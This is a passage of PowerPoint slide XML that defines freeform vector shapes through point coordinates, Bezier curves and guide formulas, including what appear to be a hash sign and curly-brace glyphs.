                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>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1" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99"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Freeform 157"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2672" y="407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Freeform 158"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2684" y="4073"/>
                <a:ext cx="5" cy="2"/>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Freeform 159"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2043"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Freeform 160"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 161"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2342" y="2562"/>
                <a:ext cx="82"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Freeform 162"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="249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Freeform 163"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2687"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Freeform 164"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2837"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8" name="Freeform 165"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="298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Freeform 166"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3182"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Freeform 167"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3332"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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14"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Freeform 168"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="371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Freeform 169"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3905"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Freeform 170"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="410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2" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55"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Freeform 171"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4285" y="2567"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 68 h 219"/>
                  <a:gd name="T2" fmla="*/ 184 w 189"/>
                  <a:gd name="T3" fmla="*/ 86 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 86 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 189"/>
                  <a:gd name="T7" fmla="*/ 136 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 136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3 w 189"/>
                  <a:gd name="T31" fmla="*/ 136 h 219"/>
                  <a:gd name="T32" fmla="*/ 48 w 189"/>
                  <a:gd name="T33" fmla="*/ 136 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 189"/>
                  <a:gd name="T35" fmla="*/ 86 h 219"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 86 h 219"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 68 h 219"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 68 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 82 w 189"/>
                  <a:gd name="T47" fmla="*/ 68 h 219"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 68 h 219"/>
                  <a:gd name="T50" fmla="*/ 138 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 68 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 68 h 219"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 86 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 189"/>
                  <a:gd name="T61" fmla="*/ 86 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 189"/>
                  <a:gd name="T63" fmla="*/ 136 h 219"/>
                  <a:gd name="T64" fmla="*/ 110 w 189"/>
                  <a:gd name="T65" fmla="*/ 136 h 219"/>
                  <a:gd name="T66" fmla="*/ 121 w 189"/>
                  <a:gd name="T67" fmla="*/ 8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8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="68"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121"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Freeform 172"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4502"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Freeform 173"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="469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Freeform 174"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4894"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Freeform 175"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5043" y="256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Freeform 176"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5241" y="2562"/>
                <a:ext cx="82"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Freeform 177"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5389"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Freeform 178"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5539"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2" name="Freeform 179"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5687"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Freeform 180"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877" y="2567"/>
                <a:ext cx="78" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 22 w 64"/>
                  <a:gd name="T3" fmla="*/ 198 h 241"/>
                  <a:gd name="T4" fmla="*/ 22 w 64"/>
                  <a:gd name="T5" fmla="*/ 157 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 128 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 113 h 241"/>
                  <a:gd name="T10" fmla="*/ 22 w 64"/>
                  <a:gd name="T11" fmla="*/ 83 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 43 h 241"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 0 h 241"/>
                  <a:gd name="T16" fmla="*/ 64 w 64"/>
                  <a:gd name="T17" fmla="*/ 18 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 64"/>
                  <a:gd name="T19" fmla="*/ 45 h 241"/>
                  <a:gd name="T20" fmla="*/ 42 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 64"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 64"/>
                  <a:gd name="T25" fmla="*/ 121 h 241"/>
                  <a:gd name="T26" fmla="*/ 42 w 64"/>
                  <a:gd name="T27" fmla="*/ 156 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 195 h 241"/>
                  <a:gd name="T30" fmla="*/ 47 w 64"/>
                  <a:gd name="T31" fmla="*/ 217 h 241"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 224 h 241"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>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241"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="241"/>
                      <a:pt x="22" y="226"/>
                      <a:pt x="22" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="139"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="112"/>
                      <a:pt x="22" y="102"/>
                      <a:pt x="22" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="43"/>
                      <a:pt x="22" y="43"/>
                      <a:pt x="22" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="15"/>
                      <a:pt x="36" y="1"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="18"/>
                      <a:pt x="64" y="18"/>
                      <a:pt x="64"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3"/>
                      <a:pt x="47" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="223"/>
                      <a:pt x="64" y="224"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64"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Freeform 181"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5985" y="2567"/>
                <a:ext cx="77" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 241"/>
                  <a:gd name="T2" fmla="*/ 41 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 241"/>
                  <a:gd name="T4" fmla="*/ 41 w 63"/>
                  <a:gd name="T5" fmla="*/ 198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1" y="139"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="241"/>
                      <a:pt x="0" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="223"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>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9" y="112"/>
                      <a:pt x="63" y="113"/>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Freeform 182"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6092"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Freeform 183"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6240"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Freeform 184"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="643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Freeform 185"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6634"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Freeform 186"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6781"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Freeform 187"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6978"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Freeform 188"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="712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Freeform 189"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7325"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Freeform 190"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7473" y="2564"/>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Freeform 191"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7671"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Freeform 192"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3461" y="255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2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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="179"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="207"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="134" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="196"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>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79"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>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8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="99"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="64"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="122" y="29"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="122" y="43"/>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3" y="160"/>
                      <a:pt x="139" y="160"/>
                      <a:pt x="135" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="149"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="188"/>
                      <a:pt x="121" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
